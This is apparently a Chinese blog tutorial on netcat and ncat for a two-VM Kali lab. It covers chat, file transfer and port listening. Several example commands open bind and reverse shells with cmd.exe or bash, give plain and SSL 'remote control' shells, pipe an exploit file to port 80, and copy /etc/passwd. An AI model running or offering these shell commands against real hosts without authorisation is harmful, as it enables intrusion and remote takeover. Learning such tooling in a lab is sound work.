nc(基础)

最新推荐文章于 2024-08-17 21:37:42 发布
最新推荐文章于 2024-08-17 21:37:42 发布
阅读量259 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rnn0921/article/details/132143111
版权

下载地址:netcat 1.11 for Win32/Win64

虚拟机下载(kali):

apt install ncat

 

nc的使用方法 

netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。

在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。

nc.exe -h即可看到各参数的使用方法。

基本格式:nc [-options] hostname port[s] [ports] ...

nc -l -p port [options] [hostname] [port]

-d 后台模式

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-L 连接关闭后,仍然继续监听

-n 指定数字的IP地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 随机本地及远程端口

-s addr 本地源地址

-t 使用TELNET交互方式

-u UDP模式

-v 详细输出--用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉--用于扫描时

基本用法:

大概有以下几种用法:

1)连接到REMOTE主机,例子:

格式:nc -nvv 192.168.x.x 80

连到192.168.x.x的TCP80端口

2)监听LOCAL主机,例子:

格式:nc -l -p 80

3)扫描远程主机,例子:

格式:nc -nvv -w2 -z 192.168.x.x 80-445

扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL,例子:

格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe

绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接,例子:

格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354

绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多,

当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。

高级用法:

6)作攻击程序用,例子:

格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80

格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt

连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)

实例:需要准备两个虚拟机(一台服务端,一台客户端)

1,文本传输:

服务端:

nc -l -p (端口号)

 客户端

nc -nv (服务端的ip) (端口号)

 此时无论是在客户端还是服务端机子上发送消息,都是可以看到的

 

 

2,文件传输

把两台机器都放在/tmp下,并把/tmp下的所有内容删除。

在客户端中准备/etc/passwd文件,拷贝到/tmp下。(将这个文件传给服务端) 

 在服务端输入命令,等待客户端发送文件,并且将发过来的文件重命名为test.txt,默认应该就是放在你刚刚在的这个目录(比如说我是/tmp)。
>是使用在接收方的命令中,<是使用在发送方的命令中

nc -lp (端口号) > (文件路径/文件名)

等待接收ing

 在客户端输入命令,传输passwd文件给服务端

nc -vn (服务端的ip) (端口号)  < (文件路径)

再来看服务端这边,已经不再是等待状态了。
查看/tmp下文件,也多了一个test.txt。

3.非加密远程控制 

服务端  nc -lp (端口号)

客户端   nc -vn (服务端ip) (端口号) -c bash

此时在服务端可以查看并操作客户端了,并且一般操作,客户端是没有任何提示语句的

 

4.加密远程控制
先在客户端输入命令,再去服务端输入命令,并且这里需要下ncat包。
客户端

apt install ncat
ncat -c bash --allow (允许访问的ip) -vnl (端口号) --ssl

服务端ncat -nv (需要控制的ip) (端口号) --ssl

可以看到已经连上被控制的电脑ip了。

 5.端口监听

服务端启动对指定端口的数据包监听
tcpdump -i eth0 tcp port (端口号)

 利用客户端连接该端口,连接不上不要紧,主要是连接这个过程会发送数据包,这样就可以在服务端看到这个数据包被监听了。

nc -vn (服务端ip) (端口号)

此时看服务端,可以看到刚刚的这次连接数据包监听结果。

 

宁可123
关注
NC开发指南(入门到精通)
01-07
NC开发指南(入门到精通):基础知识、档案开发详解、单据开发详解、报表开发详解、NC业务开发向导介绍、UAP开发进阶...
Kali Linux学习笔记---NC(telnet-banner、传输文本信息)
FengziMaMingTao的博客
03-07 341
Kali Linux学习笔记---NC(telnet-banner、传输文本信息)
Linux系统中nc的安装和使用(非常详细)零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
08-13 3454
Netcat(nc)是一个功能强大的网络工具,可以用于读取和写入文件、建立网络连接、进行端口扫描等。本文将介绍nc的安装和使用方法。Netcat(nc)是一种用于读取和写入文件的网络工具,可用于建立网络连接、进行端口扫描等。下面是nc的安装和使用的详细步骤:一、安装nc二、nc的使用方法例如,如果在第一个终端中输入“Hello, world!”,然后按Ctrl+D,则该文本将被发送到第二个终端中。这就是nc的安装和使用方法的基本步骤。请注意,nc还具有许多其他功能,例如读取和写入文件、端口扫描等。
Linux(kali)中nc/ncat实操
Selma003的博客
04-12 8658
ncat和nc命令的一些实战:文本传输、文件传输、远程控制。
kali实用工具之NC
最新发布
2301_78384345的博客
08-17 285
获取shell分为两种,一种是正向shell,一种是反向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell。相当于客户端监听6666端口的nc连接,并且把/bin/bash文件发出去,然后服务端相当于拿到了终端,就可以执行命令了。NC(netcat)被称为网络工具中的瑞士军刀,体积小巧,但功能强大。Nc主要功能是可以在两台设备上面相互交互,即侦听模式/传。
Linux下载安装Netcat
金啊豆嘞的博客
04-17 5205
第一步:下载 地址 https://nmap.org/download.html 选择Ncat这个包,这里我下载的是linux的rpm包。 第二步:安装 rpm -ivh ncat-7.91-1.x86_64.rpm 将下载好的rpm包上传到Linux中,然后进入到rpm包所在目录,使用命令: 即可完成安装。 第三步:测试 如:使用命令来创建一个soket server,并发送一些数据 ncat -lk 9999 # 监听9999端口,创建 soket Server n...
NC基础技术培训教材.doc
09-26
NC基础技术培训教材.doc
NC技术基础知识和常见问题手册
11-16
### NC技术基础知识和常见问题手册知识点详述 #### 第一部分:操作系统基本知识和工具 **一、UNIX系统** ##### 1. 帮助命令 - **man**: 用于查询命令的帮助信息。 - **用法**: `man 命令`。 - **示例**: 若要...
NC65开发课件之基础信息注册
02-07
NC65开发课件之基础信息注册 NC65开发课件之基础信息注册是NC V6.5开发环境中的一个重要步骤,这个步骤涉及到模块注册、功能注册、菜单注册等基础信息的注册,以便为新功能的开发做好准备。下面是对这个知识点的...
NC5基础档案导入模板(应用集成).rar
03-05
《用友NC5基础档案导入模板详解》 在企业信息化管理中,用友NC系统扮演着至关重要的角色,尤其在财务、供应链、生产制造等多个领域提供了全面的解决方案。其中,NC5版本是用友NC系统的一个重要迭代,它在功能上更加...
用友nc系统服务器是云端吗,用友NC服务器硬件配置要求
weixin_31321361的博客
08-12 1348
用友NC服务器硬件配置要求 内容精选换一换硬件要求如表1所示。软件要求如表2所示。物理组网方式如图1所示。集群部署如表3所示。客户端部署如表4所示。管理IP:用于远程SSH机器管理配置使用的IP。内部集群IP(cluster network):用于集群之间同步数据的IP,选取任意一个25GE网口配置即可。外部访问IP(public network):存储节点供其他节点访问的IP,弹性云服务器可以根...
netcat安装.docx
10-25
netcat0.7.1安装部署文档.。
Kali Linux中文指南pdf
04-08
Kali Linux中文指南
【kali靶机之serial】--反序列化漏洞实操
weixin_57240513的博客
08-01 660
使用kali扫描网关的主机。扫到一个开放了80端口HTTP协议的主机ip
nc-使用方法
weixin_34309543的博客
06-04 161
nc-远程克隆硬盘 A 接收端: nc -lp 333 | dd of=/dev/sda #用nc开启333监听端口 将收到的数据 写入到sda的硬盘上(前提是挂一块硬盘) B 发送端: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1 #将sda的硬盘 发送给1.1.1.1 的333端口上 完成后-q(一秒后退出) nc-端口扫...
Kali-nc(瑞士军刀)使用
兔子扛刀
10-08 4629
瑞士军刀的基本使用
kali常用操作
奇葩
01-21 1958
修改网卡配置 找到配置文件,修改网卡配置文件 网卡配置文件是 /etc/network中的interface 修改配置信息 auto eth0 # 开机自动启动 iface eth0 inet dhcp # dhcp分配方式 auto eth0 iface eth0 inet static //静态地址(动态获取用dhcp) address 192.168.77.133 //IP地址 ...
kali linux 之nc使用
黑猫'blog
03-05 1473
NC的常用功能: 标题telnet / 获取banner信息 传输文本信息 传输文件/目录 加密传输文件 流媒体服务器 远程克隆硬盘 标题telnet / 获取banner信息 nc -nv 1.1.1.1 110 nc -nv 1.1.1.1 25 nc -nv 1.1.1.1 80 传输文本信息 A:nc -l -p 888 >lsof.txt B:lsof | nc -nv 1.1.1...
kali linux 渗透测试 第五章 netcat--nc
quedgee
11-07 2101
继续记笔记~~~1.有了netcat,可以不用telnet了 2.nc的作用: 侦听模式 / 传输模式 telnet / 获取banner信息 传输文文本信息 传输文文件/⺫目目录 加密传输文文件 远程控制/木木⻢马 加密所有流量 流媒体服务器 远程克隆硬盘3.nc -v:显示详细的连接信息(输出内容) -n:不会进行DNS解析例如nc 隔壁服务器metasploita
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值